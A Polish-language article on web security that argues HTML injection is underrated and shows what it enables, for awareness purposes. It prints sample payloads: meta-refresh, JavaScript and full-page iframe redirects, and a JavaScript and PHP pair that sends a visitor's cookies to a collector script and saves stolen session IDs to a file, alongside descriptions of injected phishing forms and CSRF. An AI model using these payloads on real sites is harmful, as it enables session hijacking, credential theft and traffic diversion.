Bezpieczeństwo aplikacji internetowych.

Od dawna w Internecie przyjęło się, że ataki z rodziny HTML Injection są mało groźne i nie warto się nimi przejmować. Potwierdzeniem tego faktu jest ogromna liczba podatnych stron, w skład których wchodzą takie serwisy jak Onet, Wirtualna Polska, Gazeta.pl, a nawet YouTube.

Faktem decydującym o takim stanie rzeczy jest utożsamianie tych ataków z niegroźnymi napisami, obrazkami czy wyskakującymi komunikatami. Poniżej znajduje się kilka przykładów ukazujących co można uzyskać poprzez wykorzystanie ataków z rodziny wstrzyknięć kodu.

Opis: Ataki z rodziny wstrzyknięć kodu HTML

Przejęcie domeny

Przejęcie domeny (ruchu) może nastąpić w momencie przekierowania wchodzących użytkowników pod inny adres. Można tego dokonać na kilka sposobów, korzystając z metatagu refresh, ramek lub JavaScript. Najgroźniejszą metodą jest przekierowanie wykorzystujące metatag refresh. Dzieje się tak ponieważ większość wyszukiwarek interpretuje to przekierowanie jako stałe bądź też tymczasowe (301 / 302). Może to skutkować podmianą adresu naszej strony w indeksie wyszukiwarki, czego rezultatem będzie zniknięcie jej z wyników wyszukiwania.

Rezultatem działania kodu JavaScript oraz ramek jest przekierowania ruchu pod inną domenę. W przypadku komercyjnych stron działanie takie może doprowadzić do przekierowania nieświadomych potencjalnych klientów na stronę konkurencji.

<meta http-equiv="refresh" content="0;url=http://www.inny-adres.pl/" />

Opis: Przekierowanie z użyciem metatagu refresh.

<script>
   location.href="http://www.wp.pl/";
</script>

Opis: Przekierowanie z użyciem JavaScript.

<iframe src="http://www.onet.pl" style="position:absolute; width:100%; height:100%; top:0px; left:0px;" />

Opis: Ramka zasłaniająca resztę strony.

Phishing

Jak podaje Wikipedia phishing to

... oszukańcze pozyskanie poufnej informacji osobistej ...

Jak wykorzystać to w kwestii HTML Injection? Z przykładowym wykorzystaniem można się zapoznać w notce Phishing w Pasażu Wirtualnej Polski. Jak można w niej zauważyć umiejętne wstrzyknięcie formularza logowania może umożliwić napastnikowi dostęp do poufnych danych użytkownika.

Wykorzystanie błędów aplikacji

Niemal każdego tygodnia Secunia informuje o wykryciu nowych błędów w przeglądarkach internetowych bądź też w dodatkach do nich. Błędów, które wyjątkowo zagrażają bezpieczeństwu użytkowników (ze względu na skalę używalności przeglądarek), a do tego są łatwe do wykonania – wystarczy tylko odpowiednio spreparowany kod HTML.

Łącząc błędy programów z podatnością na atak HTML Injection otrzymujemy możliwość dostępu do większej ilości internautów, a co za tym idzie do zwiększenia skutku ataku.

Przejęcie konta użytkownika

Przejęcia konta użytkownika bez konieczności logowania możliwe jest dzięki kradzieży pliku cookie. Niebezpieczeństwo tego ataku wynika z faktu przechowywania w ciastku identyfikatora sesji, dzięki któremu można powiązać użytkownika z jego kontem. W przypadku gdy agresor podmieni swój identyfikator sesji na identyfikator zalogowanego użytkownika zostanie zidentyfikowany jako właściciel danego konta.

<script type="text/javascript">
  document.write( "<img src='new.php?sesja=" document.cookie "' />" );
</script>

<?php
  file_put_contents( 'plik.txt', $_GET['sesja'] );
?>

Opis: Zestaw skryptów JavaScript oraz PHP umożliwiający kradzież plików cookie.

Wykonanie akcji z uprawieniami zalogowanego użytkownika

Nawet najbardziej wyrafinowane systemy zabezpieczenia kont użytkowników na nic się nie zdadzą jeśli aplikacja będzie podatna na CSRF. Zadaniem CSRF jest wykonanie określonej akcji z uprawnieniami zalogowanego użytkownika. Można to osiągnąć np. ładując dostępną tylko dla zalogowanych użytkownika stronę w ukrytej ramce, odwołując sie do niej poprzez AJAX lub np osadzić ją jako źródło obrazka.

Opis: Przykład działania ataku CSRF

Przedstawione przeze mnie przykłady nie wyczerpują możliwości ataków HTML Injection. Jedynym ich ogranicznikiem jest wyobraźnia atakującego i stopień podatności serwisu.

Na pytanie czy warto się zabezpieczyć niech każdy odpowie sam.